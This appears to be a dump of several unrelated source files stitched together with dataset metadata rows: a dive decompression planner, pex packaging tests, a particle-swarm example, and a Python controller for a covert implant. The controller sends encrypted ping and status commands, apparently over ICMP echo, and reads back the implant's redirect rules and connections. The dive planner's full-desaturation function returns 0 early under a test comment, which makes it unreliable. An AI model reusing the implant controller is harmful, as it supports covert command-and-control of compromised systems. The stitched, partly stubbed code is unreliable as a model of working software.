self.is_closed_circuit = False
else:
self.is_closed_circuit = True
self.in_final_ascent = False
# check if tank for 1rst segment is suitable for descent (OC mode)
if (not self.is_closed_circuit and
self.input_segments[0].tank.get_min_od() > 0):
# tank is not ok, we need to look for another better tank
# at first, try to find a tank suitable
# from 0m to depth of first segment
self.logger.debug("bottom gaz not ok for descent")
self.tanks.reverse()
for tank in self.tanks:
if tank.get_min_od() == 0:
self.logger.debug(
"This tank may be suitable:%s, mod:%s, end at d:%s",
str(tank), tank.mod, tank.get_end_for_given_depth(
self.input_segments[0].depth))
if (tank.mod >= self.input_segments[0].depth and
tank.get_end_for_given_depth(
self.input_segments[0].depth) <
settings.DEFAULT_MAX_END):
# ok we have a winner
self.logger.info(
"Changed tank for descent to:%s", str(tank))
self.current_tank = tank
break
if self.current_tank == self.input_segments[0].tank:
# not found : we need to stop in the descent
# to switch from first gas
# to bottom gas
self.logger.debug("No directly usage tank found,"
" try to stop and change tank")
for tank in self.tanks:
if tank.get_min_od() == 0:
self.logger.debug(
"This tank may be suitable:%s, "
"mod:%s, end at d:%s",
str(tank),
tank.mod,
tank.get_end_for_given_depth(
self.input_segments[0].depth))
if settings.TRAVEL_SWITCH == 'late':
depth = min(tank.mod, tank.get_mod_for_given_end(
settings.DEFAULT_MAX_END))
self.input_segments.insert(0, SegmentDive(
depth=depth,
tank=self.input_segments[0].tank,
time=0))
self.input_segments.insert(0, SegmentDive(
depth=depth, tank=tank, time=0))
self.current_tank = tank
break
else: # early
depth = self.input_segments[0].tank.get_min_od(
min_ppo2=settings.DEFAULT_MIN_PPO2)
self.input_segments.insert(0, SegmentDive(
depth=depth,
tank=self.input_segments[0].tank,
time=0))
self.input_segments.insert(0, SegmentDive(
depth=depth, tank=tank, time=0))
self.current_tank = tank
break
self.tanks.sort()
for seg in self.input_segments:
if seg.type == 'const': # only dive segment allowed for input
delta_depth = float(seg.depth) - float(self.current_depth)
# Ascend or descend to dive segment,
# using existing gas and ppO2 settings
if delta_depth > 0.0: # descent
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(seg.depth),
settings.DESCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentAscDesc(self.current_depth,
seg.depth,
settings.DESCENT_RATE,
self.current_tank,
self.pp_o2))
self.run_time += abs(float(delta_depth) /
(float(settings.DESCENT_RATE)))
self.logger.debug("descent time : %ss",
float(delta_depth) /
settings.DESCENT_RATE)
else: # ascent
# call ascend method of this class
# for decompression calculation
self.ascend(seg.depth)
# we are now at the desired depth : process the dive segment
self.current_depth = seg.depth # new depth
self.pp_o2 = seg.setpoint
self.current_tank = seg.tank
if seg.time > 0: # only do this if it's not a waypoint
if run_time_flag:
run_time_flag = False # do this one only
self.model.const_depth(depth_to_pressure(seg.depth),
seg.time - self.run_time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentDive(seg.depth,
seg.time - self.run_time,
self.current_tank,
self.pp_o2))
self.metadata += "Dive to %s for %ss\n" % (
seg.depth, seg.time - self.run_time)
self.logger.debug("Dive to %s for %ss",
seg.depth,
seg.time - self.run_time)
# run_time = seg_time because it's
# only done the first time
self.run_time = seg.time
self.logger.debug(
"update run time : %ss", self.run_time)
else:
self.model.const_depth(depth_to_pressure(seg.depth),
seg.time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.output_segments.append(
SegmentDive(seg.depth,
seg.time,
self.current_tank,
self.pp_o2))
self.metadata += "Dive to %s for %ss\n" % (seg.depth,
seg.time)
self.logger.debug("Dive to %s for %ss",
seg.depth, seg.time)
self.run_time += seg.time
self.logger.debug("update run time : %ss",
self.run_time)
else: # process waypoint
self.output_segments.append(
SegmentDive(seg.depth,
seg.time,
self.current_tank,
self.pp_o2))
# all input segment are now processed: process to ascend to the surface
self.in_final_ascent = True
# ascend to the surface
self.ascend(0.0)
# for each output segment, recalculate runtime and update segments
total_time = 0
for output_seg in self.output_segments:
total_time += output_seg.time
output_seg.run_time = total_time
if total_time != self.run_time:
self.logger.warning("dive run_time (%ss) differs from"
" all segments time (%ss)",
self.run_time, total_time)
# write metadata into the model
self.model.metadata = self.metadata
# recalculate the gas consumptions
self.do_gas_calcs()
# save the tanks parameters : next dives may use the same tanks,
# but we need here to duplicate tank object within this dive in
# order to save the tank parameters for this dive only
saved_tanks = []
for tank in self.tanks:
saved_tanks.append(copy.deepcopy(tank))
self.tanks = saved_tanks
def get_no_flight_hhmmss(self):
"""Return no flight time (if calculated) in hhmmss format.
instead of an int in seconds
.. note::
This method does not calculate no_flight_time
you need to call no_flight_time() or
no_flight_time_wo_exception() before.
:returns: "hh:mm:ss" no flight time
"" (empty string) if no flight time is not calculated
:rtype: str
"""
if self.no_flight_time_value is not None:
return seconds_to_hhmmss(self.no_flight_time_value)
else:
return ""
def no_flight_time_wo_exception(self,
altitude=settings.FLIGHT_ALTITUDE,
tank=None):
"""Call no_flight_time, and handle exceptions internally.
do not raise any "dive related" exception: add the
exception inside self.dive_exceptions instead.
:param int altitude: in meter : altitude used for the calculation
:param float flight_ascent_rate: in m/s
:param tank: [optionnal]
it is possible to provide a tank while calling
no_flight_time to force "no flight deco" with
another mix than air.
In this case, we will 'consume' the tank
When the tank is empty, it automatically switch to air
:type tank: :class:`dipplanner.tank.Tank`
:returns: no fight time in seconds
:rtype: int
"""
try:
result = self.no_flight_time(altitude, tank)
except DipplannerException as exc:
self.dive_exceptions.append(exc)
except Exception as exc: # unknown generic exception
self.dive_exceptions.append(
DipplannerException("Unknown exception occured: %s" % exc))
else:
return result
def no_flight_time(self, altitude=settings.FLIGHT_ALTITUDE, tank=None):
"""Evaluate the no flight time.
by 'ascending' to the choosen flight altitude.
Ascending will generate the necessary 'stop' at the current depth
(which is 0m) .
The stop time represents the no flight time
:param int altitude: in meter : altitude used for the calculation
:param float flight_ascent_rate: in m/ms
:param tank: (optionnal)
it is possible to provide a tank while calling
no_flight_time to force "no flight deco" with
another mix than air.
In this case, we will 'consume' the tank
When the tank is empty, it automatically switch to air
:type tank: :class:`dipplanner.tank.Tank`
:returns: no fight time in seconds
:rtype: int
:raises InfiniteDeco: if the no flight time can not achieve enough
decompression to be able to go to give altitude
"""
no_flight_time = 0
deco_uses_tank = False # set to true when deco is using a tank
# need to change gaz to air:
# create a 'dummy' air tank
no_flight_air_tank = Tank(
tank_vol=settings.ABSOLUTE_MAX_TANK_SIZE,
tank_pressure=settings.ABSOLUTE_MAX_TANK_PRESSURE,
tank_rule="30b")
if tank is not None:
no_flight_tank = tank
deco_uses_tank = True
self.logger.info("Accelerating no flight"
"time using a tank:%s", tank)
else:
no_flight_tank = no_flight_air_tank
next_stop_pressure = altitude_or_depth_to_absolute_pressure(altitude)
# bigger stop time to speed up calculation
# (precision is not necesary here)
stop_time = 60 # in second -
model_copy = copy.deepcopy(self.model)
model_ceiling = model_copy.ceiling_in_pabs()
while model_ceiling > next_stop_pressure:
# loop for "deco" calculation based on the new ceiling
model_copy.const_depth(0.0,
stop_time,
no_flight_tank.f_he, # f_he
no_flight_tank.f_n2, # f_n2
0.0) # ppo2 (for cc)
no_flight_time += stop_time
model_ceiling = model_copy.ceiling_in_pabs()
if deco_uses_tank:
if no_flight_tank.remaining_gas <= 0:
no_flight_tank = no_flight_air_tank
deco_uses_tank = False
self.logger.info("Tank used for accelerating "
"no flight time is empty, "
"swithing to air at %s s",
no_flight_time)
else:
no_flight_tank.consume_gas(
settings.DECO_CONSUMPTION_RATE * stop_time)
if no_flight_time > 300000:
raise InfiniteDeco("Infinite deco error")
self.no_flight_time_value = no_flight_time
return no_flight_time
def get_full_desat_hhmmss(self):
"""Return full desat time (if calculated) in hhmmss format.
instead of an int in seconds
:returns: "hh:mm:ss" full desat time
:rtype: str
"""
if self.full_desat_time_value is not None:
return seconds_to_hhmmss(self.full_desat_time_value)
else:
return seconds_to_hhmmss(self.full_desat_time())
def full_desat_time(self):
"""Evaluate the full desat time.
By doing deco at const depth of 0m until all compartement
are (nearly) empty.
Because of compartments halftimes, full desat is never really achieved.
So we need to setup an arbitrary "margin": when sur-saturation falls
below this margin, we consider that the compartment is not satured
anymore.
:returns: full desat time in seconds
:rtype: int
:raises InfiniteDeco: if the no flight time can not achieve enough
decompression to be able to go to give altitude
"""
# TODO: DONE FOR TESTS HERE:
return 0
full_desat_time = 0
margin = 0.01 + calculate_pp_h2o_surf(settings.SURFACE_TEMP)
# bigger stop time to speed up calculation
# (precision is not necesary here)
stop_time = 60 # in second
model_copy = copy.deepcopy(self.model)
full_desat = False
while not full_desat:
# loop for "deco" calculation based on the new ceiling
model_copy.const_depth(pressure=0.0,
seg_time=stop_time,
f_he=0.0,
f_n2=settings.DEFAULT_AIR_FN2,
pp_o2=0.0)
full_desat_time += stop_time
if full_desat_time > 300000:
raise InfiniteDeco("Infinite deco error")
full_desat = True
for comp in model_copy.tissues:
if (comp.pp_n2 > settings.DEFAULT_AIR_FN2 + margin or
comp.pp_he > margin):
full_desat = False
break
self.full_desat_time_value = full_desat_time
return full_desat_time
def ascend(self, target_depth):
"""Ascend to target depth, decompressing if necessary.
If inFinalAscent then gradient factors start changing,
and automatic gas selection is made.
This method is called by do_dive()
:param float target_depth: in meter, target depth for the ascend
:raises ModelException: <Exceptions from model>
"""
force_deco_stop = False
in_deco_cycle = False
deco_stop_time = 0
if self.in_final_ascent and settings.USE_OC_DECO:
self.set_deco_gas(self.current_depth)
if self.current_depth < target_depth:
# going backwards !
raise ProcessingError("Not allowed to ascend while descending !")
# Set initial stop to be the next integral stop depth
if self.current_depth % settings.STOP_DEPTH_INCREMENT > 0:
# we are not on a stop depth already : go to the next stop depth
next_stop_depth = (int(self.current_depth /
settings.STOP_DEPTH_INCREMENT) *
settings.STOP_DEPTH_INCREMENT)
else:
next_stop_depth = int(self.current_depth -
settings.STOP_DEPTH_INCREMENT)
self.logger.debug("next_stop_depth: %s", next_stop_depth)
# hack in case we are overshooting or hit last stop or any of
# the other bizzar combinations ...
if (next_stop_depth < target_depth or
self.current_depth < settings.LAST_STOP_DEPTH):
next_stop_depth = target_depth
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
elif next_stop_depth == settings.LAST_STOP_DEPTH:
self.logger.warning("next_stop_depth==LAST_STOP_DEPTH !")
next_stop_depth = target_depth
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
elif next_stop_depth < settings.LAST_STOP_DEPTH:
next_stop_depth = settings.LAST_STOP_DEPTH
self.logger.debug("new next_stop_depth: %s", next_stop_depth)
# Initialise ascent segment start depth
start_depth = self.current_depth
in_ascent_cycle = True # Start in free ascent
# Initialise gradient factor for next (in this case first) stop depth
self.model.gradient.set_gf_at_depth(next_stop_depth)
# Remember maxM-Value and controlling compartment
max_mv = self.model.m_value(depth_to_pressure(self.current_depth))
control = self.model.control_compartment()
while self.current_depth > target_depth:
self.logger.debug("ascent from: %s, to: %s",
self.current_depth, next_stop_depth)
# can we move to the proposed next stop depth ?
model_ceiling = self.model.ceiling()
self.logger.debug("model ceiling: %s", model_ceiling)
while force_deco_stop or next_stop_depth < model_ceiling:
in_deco_cycle = True
# Only used for first entry into deco stop
force_deco_stop = False
if in_ascent_cycle:
# Finalise last ascent cycle as we are now decomp
if start_depth > self.current_depth:
# add ascent segment
self.logger.debug("Add AscDesc(1): start_depth:%s "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
settings.ASCENT_RATE,
self.current_tank,
self.pp_o2))
in_ascent_cycle = False
# set m-value gradient under the following conditions:
# - if not in multilevel mode, then set it as soon as
# we do a decompression cycle
# - otherwise wait until we are finally
# surfacing before setting it
if ((not settings.MULTILEVEL_MODE or self.in_final_ascent) and
(not self.model.gradient.gf_set)):
self.model.gradient.set_gf_slope_at_depth(
self.current_depth)
self.model.gradient.set_gf_at_depth(next_stop_depth)
self.logger.debug("...set m-value gradient: %s",
self.model.gradient.gf)
# calculate stop_time
# if (deco_stop_time == 0 and
# self.run_time % settings.STOP_TIME_INCREMENT > 0):
# stop_time = (
# int(self.run_time / settings.STOP_TIME_INCREMENT) *
# settings.STOP_TIME_INCREMENT +
# settings.STOP_TIME_INCREMENT - self.run_time)
# print("+++++ ", stop_time)
# if stop_time == 0:
# stop_time = settings.STOP_TIME_INCREMENT # in second
# else:
stop_time = settings.STOP_TIME_INCREMENT # in second
# execute the stop
self.model.const_depth(depth_to_pressure(self.current_depth),
stop_time,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
deco_stop_time += stop_time
# sanity check for infinite loop
if deco_stop_time > 300000:
raise InfiniteDeco("Infinite deco error")
model_ceiling = self.model.ceiling()
# finished decompression loop
if in_deco_cycle:
self.logger.debug("...in deco cycle")
# finalise the last deco cycle
self.run_time += deco_stop_time
self.logger.debug(
"update run time with deco time: %ss at %sm (runtime:%s)",
deco_stop_time, self.current_depth, self.run_time)
if settings.FORCE_ALL_STOPS:
force_deco_stop = True
# write deco segment
deco_segment = SegmentDeco(self.current_depth,
deco_stop_time,
self.current_tank,
self.pp_o2)
deco_segment.mv_max = max_mv
deco_segment.gf_used = self.model.gradient.gf
deco_segment.control_compartment = control
self.output_segments.append(deco_segment)
in_deco_cycle = False
deco_stop_time = 0
if in_ascent_cycle:
self.logger.debug("...in ascent cycle, do asc from %s to %s",
self.current_depth, next_stop_depth)
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(next_stop_depth),
-settings.ASCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.run_time += abs((float(self.current_depth) -
float(next_stop_depth)) /
float(settings.ASCENT_RATE))
self.logger.debug("update run time : %ss", self.run_time)
else:
self.logger.debug("...in deco cycle, do asc from %s to %s",
self.current_depth, next_stop_depth)
self.model.asc_desc(depth_to_pressure(self.current_depth),
depth_to_pressure(next_stop_depth),
-settings.DECO_ASCENT_RATE,
self.current_tank.f_he,
self.current_tank.f_n2,
self.pp_o2)
self.run_time += abs((float(self.current_depth) -
float(next_stop_depth)) /
float(settings.DECO_ASCENT_RATE))
self.logger.debug("update run time : %ss", self.run_time)
self.output_segments.append(
SegmentAscDesc(self.current_depth,
next_stop_depth,
settings.DECO_ASCENT_RATE,
self.current_tank,
self.pp_o2))
# now we moved up the the next depth
self.current_depth = next_stop_depth
max_mv = self.model.m_value(depth_to_pressure(self.current_depth))
control = self.model.control_compartment()
# Check and switch deco gas
temp_tank = self.current_tank # remember in case we switch
if self.set_deco_gas(self.current_depth): # True if we changed gas
if in_ascent_cycle:
self.logger.debug("Add AscDesc(2): start_depth:%s, "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
settings.ASCENT_RATE,
temp_tank,
self.pp_o2))
start_depth = self.current_depth
# set next rounded stop depth
next_stop_depth = int(
self.current_depth) - settings.STOP_DEPTH_INCREMENT
self.logger.debug("next stop depth: %s, target depth: %s",
next_stop_depth, target_depth)
# check in cas we are overshooting or hit last stop
if (next_stop_depth < target_depth or
self.current_depth < settings.LAST_STOP_DEPTH):
self.logger.debug("next_stop_depth (%s) < target_depth (%s)",
next_stop_depth, target_depth)
next_stop_depth = target_depth
elif self.current_depth < settings.LAST_STOP_DEPTH:
self.logger.debug("current_depth (%s) < LAST_STOP_DEPTH (%s)",
self.current_depth,
settings.LAST_STOP_DEPTH)
next_stop_depth = target_depth
elif (next_stop_depth < settings.LAST_STOP_DEPTH and
next_stop_depth > 0):
self.logger.debug("next_stop_depth (%s) < "
"settings.LAST_STOP_DEPTH (%s)",
next_stop_depth, settings.LAST_STOP_DEPTH)
next_stop_depth = target_depth
if self.model.gradient.gf_set: # update gf for next stop
self.model.gradient.set_gf_at_depth(next_stop_depth)
# are we still in ascent segment ?
if in_ascent_cycle:
self.logger.debug("Add AscDesc(3): start_depth:%s, "
"current_depth:%s",
start_depth, self.current_depth)
self.output_segments.append(
SegmentAscDesc(start_depth,
self.current_depth,
-settings.ASCENT_RATE,
self.current_tank,
self.pp_o2))
def do_gas_calcs(self):
"""Estimate gas consumption for all output segments.
and set this into the respective gas objects
:raises InvalidGas: <Exceptions from tank>
:raises InvalidTank: <Exceptions from tank>
:raises InvalidMod: <Exceptions from tank>
:raises EmptyTank: <Exceptions from tank>
"""
for seg in self.output_segments:
seg.tank.consume_gas(seg.gas_used)
def set_deco_gas(self, depth):
"""Select appropriate deco gas for the depth specified.
Returns true if a gas switch occured
:param float depth: target depth to make the choice
:returns: True -- if gas swich occured
False -- if no gas switch occured
:rtype: bool
:raises InvalidGas: <Exceptions from tank>
:raises InvalidTank: <Exceptions from tank>
:raises InvalidMod: <Exceptions from tank>
:raises EmptyTank: <Exceptions from tank>
"""
gas_switch = False
# check to see if we should be changing gases at all ...
# if so just return doing nothing
if not self.in_final_ascent:
return False
if not settings.USE_OC_DECO:
return False
if len(self.tanks) == 0:
return False
# check and switch deco gases
current_tank_sav = self.current_tank
for temp_tank in self.tanks:
if (temp_tank.get_mod() >= depth and
temp_tank.get_min_od() < depth):
# authorised tank at this depth
if temp_tank < current_tank_sav:
if self.is_closed_circuit:
# only change from CC to OC when a valid tank
# for deco is available
self.pp_o2 = False
self.is_closed_circuit = False
self.current_tank = temp_tank
gas_switch = True
self.logger.info("Changing gas from %s (mod:%s)"
"to %s (mod:%s)",
current_tank_sav,
current_tank_sav.get_mod(),
self.current_tank,
self.current_tank.get_mod())
# else:
# break
return gas_switch
| gpl-3.0 | -5,919,731,483,727,860,000 | 41.272374 | 79 | 0.51933 | false | 4.407749 | false | false | false |
kwlzn/pex | tests/test_pex_builder.py | 1 | 5519 | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import stat
import pytest
from twitter.common.contextutil import temporary_dir
from twitter.common.dirutil import safe_mkdir
from pex.common import open_zip
from pex.compatibility import WINDOWS, nested
from pex.pex import PEX
from pex.pex_builder import PEXBuilder
from pex.testing import make_bdist
from pex.testing import write_simple_pex as write_pex
from pex.util import DistributionHelper
exe_main = """
import sys
from my_package.my_module import do_something
do_something()
with open(sys.argv[1], 'w') as fp:
fp.write('success')
"""
wheeldeps_exe_main = """
import sys
from pyparsing import *
from my_package.my_module import do_something
do_something()
with open(sys.argv[1], 'w') as fp:
fp.write('success')
"""
def test_pex_builder():
# test w/ and w/o zipfile dists
with nested(temporary_dir(), make_bdist('p1', zipped=True)) as (td, p1):
write_pex(td, exe_main, dists=[p1])
success_txt = os.path.join(td, 'success.txt')
PEX(td).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
# test w/ and w/o zipfile dists
with nested(temporary_dir(), temporary_dir(), make_bdist('p1', zipped=True)) as (
td1, td2, p1):
target_egg_dir = os.path.join(td2, os.path.basename(p1.location))
safe_mkdir(target_egg_dir)
with open_zip(p1.location, 'r') as zf:
zf.extractall(target_egg_dir)
p1 = DistributionHelper.distribution_from_path(target_egg_dir)
write_pex(td1, exe_main, dists=[p1])
success_txt = os.path.join(td1, 'success.txt')
PEX(td1).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
def test_pex_builder_wheeldep():
"""Repeat the pex_builder test, but this time include an import of
something from a wheel that doesn't come in importable form.
"""
with nested(temporary_dir(), make_bdist('p1', zipped=True)) as (td, p1):
pyparsing_path = "./tests/example_packages/pyparsing-2.1.10-py2.py3-none-any.whl"
dist = DistributionHelper.distribution_from_path(pyparsing_path)
write_pex(td, wheeldeps_exe_main, dists=[p1, dist])
success_txt = os.path.join(td, 'success.txt')
PEX(td).run(args=[success_txt])
assert os.path.exists(success_txt)
with open(success_txt) as fp:
assert fp.read() == 'success'
def test_pex_builder_shebang():
def builder(shebang):
pb = PEXBuilder()
pb.set_shebang(shebang)
return pb
for pb in builder('foobar'), builder('#!foobar'):
for b in pb, pb.clone():
with temporary_dir() as td:
target = os.path.join(td, 'foo.pex')
b.build(target)
expected_preamble = b'#!foobar\n'
with open(target, 'rb') as fp:
assert fp.read(len(expected_preamble)) == expected_preamble
def test_pex_builder_preamble():
with temporary_dir() as td:
target = os.path.join(td, 'foo.pex')
should_create = os.path.join(td, 'foo.1')
tempfile_preamble = "\n".join([
"import sys",
"open('{0}', 'w').close()".format(should_create),
"sys.exit(3)"
])
pex_builder = PEXBuilder(preamble=tempfile_preamble)
pex_builder.build(target)
assert not os.path.exists(should_create)
pex = PEX(target)
process = pex.run(blocking=False)
process.wait()
assert process.returncode == 3
assert os.path.exists(should_create)
def test_pex_builder_compilation():
with nested(temporary_dir(), temporary_dir(), temporary_dir()) as (td1, td2, td3):
src = os.path.join(td1, 'src.py')
with open(src, 'w') as fp:
fp.write(exe_main)
exe = os.path.join(td1, 'exe.py')
with open(exe, 'w') as fp:
fp.write(exe_main)
def build_and_check(path, precompile):
pb = PEXBuilder(path)
pb.add_source(src, 'lib/src.py')
pb.set_executable(exe, 'exe.py')
pb.freeze(bytecode_compile=precompile)
for pyc_file in ('exe.pyc', 'lib/src.pyc', '__main__.pyc'):
pyc_exists = os.path.exists(os.path.join(path, pyc_file))
if precompile:
assert pyc_exists
else:
assert not pyc_exists
bootstrap_dir = os.path.join(path, PEXBuilder.BOOTSTRAP_DIR)
bootstrap_pycs = []
for _, _, files in os.walk(bootstrap_dir):
bootstrap_pycs.extend(f for f in files if f.endswith('.pyc'))
if precompile:
assert len(bootstrap_pycs) > 0
else:
assert 0 == len(bootstrap_pycs)
build_and_check(td2, False)
build_and_check(td3, True)
@pytest.mark.skipif(WINDOWS, reason='No hardlinks on windows')
def test_pex_builder_copy_or_link():
with nested(temporary_dir(), temporary_dir(), temporary_dir()) as (td1, td2, td3):
src = os.path.join(td1, 'exe.py')
with open(src, 'w') as fp:
fp.write(exe_main)
def build_and_check(path, copy):
pb = PEXBuilder(path, copy=copy)
pb.add_source(src, 'exe.py')
path_clone = os.path.join(path, '__clone')
pb.clone(into=path_clone)
for root in path, path_clone:
s1 = os.stat(src)
s2 = os.stat(os.path.join(root, 'exe.py'))
is_link = (s1[stat.ST_INO], s1[stat.ST_DEV]) == (s2[stat.ST_INO], s2[stat.ST_DEV])
if copy:
assert not is_link
else:
assert is_link
build_and_check(td2, False)
build_and_check(td3, True)
| apache-2.0 | -7,104,494,122,520,016,000 | 29.491713 | 90 | 0.64595 | false | 3.091877 | true | false | false |
avanwyk/cipy | examples/pso_optimizer.py | 1 | 1205 | # Copyright 2016 Andrich van Wyk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cipy.algorithms.core import max_iterations
from cipy.benchmarks.functions import sphere
from cipy.optimizers.pso_optimizer import PSOOptimizer
def main(dimension, iterations):
""" Main function for PSO optimizer example.
Instantiate PSOOptimizer to optimize 30-dimensional spherical function.
"""
optimizer = PSOOptimizer()
solution = optimizer.minimize(sphere, -5.12, 5.12, dimension,
max_iterations(iterations))
return solution, optimizer
if __name__ == "__main__":
solution, optimizer = main(30, 1000)
print(solution)
print(optimizer.accuracy())
| apache-2.0 | 5,783,334,716,175,215,000 | 34.441176 | 75 | 0.728631 | false | 4.198606 | false | false | false |
DarthMaulware/EquationGroupLeaks | Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/echocmd.py | 1 | 23387 | import base
import icmpecho
import tcpstream
import crypto
import time
import struct
import string
import re
import sha
import hex
class ECHOCMD(base.Command):
def __init__(self):
base.Command.__init__(self)
self.op = 0
self.res = 0
self.auth_1 = 0xFFFFFF00L
self.data = ""
def run(self):
if self.implant.protocol.sock != None:
return None
else:
return "Not connected. Try: %s help connect" % (self.implant.session.name)
#------------------------------------------------------------------------
# Name : Assemble
# Purpose: Form a packet to be sent to the implant
# Receive: << nothing >>
# Return : << nothing >>
#------------------------------------------------------------------------
def Assemble(self):
# Find the current time
currTime = time.time();
curr_time_sec = int(currTime)
# Pack the data structure
self.cmddata = struct.pack("!HH", 0, self.op)
self.cmddata = self.cmddata + struct.pack("!L",curr_time_sec + \
self.implant.timediff)
self.cmddata = self.cmddata + self.data
# Add extra chars at the end to fill packet to correct size
for i in range(self.implant.packetSize - len(self.cmddata) - 28):
self.cmddata = self.cmddata + '\000'
# Add some padding for RC6
if self.implant.cipher.num == 2:
self.cmddata = '\000\000\000\000\000\000\000\000' + self.cmddata
#------------------------------------------------------------------------
# Name : Disassemble
# Purpose: Process a packet received from the implant
# Receive: data - The raw packet data
# Return : << nothing >>
#------------------------------------------------------------------------
def Disassemble(self,data):
# Remove the padding for RC6
if self.implant.cipher.num == 2:
data = data[8:]
self.op = struct.unpack("!H",data[2:4])[0]
self.res = struct.unpack("!H",data[0:2])[0]
# Check for ALIVE bit in the return
if (self.res & 0x8000L):
self.res = self.res & 0x7fL
else:
print "Alive bit not set in return packet"
self.ts = struct.unpack("!L",data[4:8])[0]
self.data = data[8:]
#------------------------------------------------------------------------
# Name : Query
# Purpose: Encrypt and send a query to an implant, then decrypt the resp.
# Receive: << nothing >>
# Return : << nothing >>
#------------------------------------------------------------------------
def Query(self):
""" Will return result """
self.Assemble()
# Setup the protocol
self.protocol = self.implant.protocol
self.protocol.SetDestination(self.implant.session.target.ip)
# for i=0 to max_retries
for i in range(2):
try:
# Send the packet
self.protocol.SendTo(self.cmddata)
# Get the response
myData = self.protocol.RecvFrom()
if( myData != None and myData != ""):
self.Disassemble(myData)
break
except:
print "Retrying"
continue
#------------------------------------------------------------------------
# Name : ConvertIP
# Purpose: Convert an IP address to decimal form
# Receive: ip - The ip address to convert
# Return : the IP address in network byte order
#------------------------------------------------------------------------
def ConvertIP(self,ip):
#regLine = regex.compile('^\([\\][0-3]?[0-7]?[0-7]\)*$')
#regS = regex.compile('\([\\][0-3]?[0-7]?[0-7]\)')
if( type(ip) == type('') ):
#if regLine.match(ip) == 0:
# pos = 0
# ipStr = ''
# while pos < len(ip):
# Cs = regS.search(ip,pos)
# Cl = regS.match(ip,pos)
# pos = Cs+Cl
# ipStr = ipStr + eval("'"+ip[Cs:pos]+"'")
#else:
ipParts = string.splitfields(ip,'.')
if len(ipParts) == 4:
ipStr = chr(eval(ipParts[0]))
ipStr = ipStr+chr(eval(ipParts[1]))
ipStr = ipStr+chr(eval(ipParts[2]))
ipStr = ipStr+chr(eval(ipParts[3]))
else:
#ipStr = ip
raise ValueError, ip
else:
ipStr = struct.pack("!L",ip)
return ipStr
def ConvertToDot(self, ip):
if type(ip) == type('a'):
ip = struct.unpack("!L",ip)[0]
return "%d.%d.%d.%d" % ((int)(ip / 16777216) & 0xFFL,\
(int)(ip / 65536) & 0xFFL,\
(int)(ip / 256) & 0xFFL,\
ip & 0xFFL)
def ConvertTime(self, time):
if type(time) == type(3600):
return time
#x = regex.compile("^\([-]\)?\(\([0-9]*\)D\)?\(\([0-9]*\)H\)?\(\([0-9]*\)M\)?\(\([0-9]*\)[S]?\)?$")
regep = re.compile("^([+-]?)(([0-9]+)D)?(([0-9]+)H)?(([0-9]+)M)?(([0-9]+)S?)?$")
x = regep.match(string.upper(time))
if x:
times = [x.group(3), x.group(5), x.group(7), x.group(9)]
for i in range(4):
if times[i] == None or times[i] == "":
times[i] = "0"
time = eval(times[0]) * 86400 + eval(times[1]) * 3600 \
+ eval(times[2]) * 60 + eval(times[3])
if x.group(1) == "-":
time = time * -1
return time
raise ValueError, time
def TimeConvert(self,time):
if type(time) == type("1h"):
return time
if time < 1:
fmtString = "-"
time = time * -1
else:
fmtString = ""
sec = time % 60
time = time - sec
min = time % 3600
time = time - min
min = min/60
hour = time % 86400
time = time - hour
hour = hour / 3600
day = time / 86400
if day:
fmtString = fmtString + "%dd" %(day)
if hour:
fmtString = fmtString + "%dh" %(hour)
if min:
fmtString = fmtString + "%dm" %(min)
if sec:
fmtString = fmtString + "%ds" % (sec)
return fmtString
##########################################################################
# PING class
# op code: 0x00
#########################################################################
class ECHOCMD_PING(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "ping"
self.usage = "ping"
self.info = "Send an are-you-there ping to the target"
self.op = 0x00L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.Query()
if self.op == 0x0L and self.res == 0x01L:
# Set the timediff
self.implant.timediff = self.ts - time.time()
return (1,"implant is alive, setting timediff to %s" %\
(self.TimeConvert(self.implant.timediff)))
else:
return (0,"implant is NOT alive")
##########################################################################
# STATUS class
# op code: 0x01
#########################################################################
class ECHOCMD_STATUS(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "status"
self.usage = "status"
self.info = "Find version of the implant, number of fd in use etc.."
self.op = 0x01L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.Query()
if self.op == 0x01L and self.res == 0x01L:
ver = struct.unpack("!H",'\000'+self.data[:1])[0]
unused = struct.unpack("!H",'\000'+self.data[1:2])[0]
fd = struct.unpack("!H",self.data[2:4])[0]
boot_sec = struct.unpack("!L",self.data[4:8])[0]
dns,redir,conn = struct.unpack("!LLL",self.data[8:20])
res = "Remote version: %d\n" % ver
res = res + "Time host was last rebooted: %s\n" % \
time.ctime(time.time()-boot_sec + self.implant.timediff)
res = res + "%d Active DNS rules\n" %(dns)
res = res + "%d Active redirect rules\n" %(redir)
res = res + "%d Active connections" %(conn)
return (1,res)
else:
return (0,"Status operation failed")
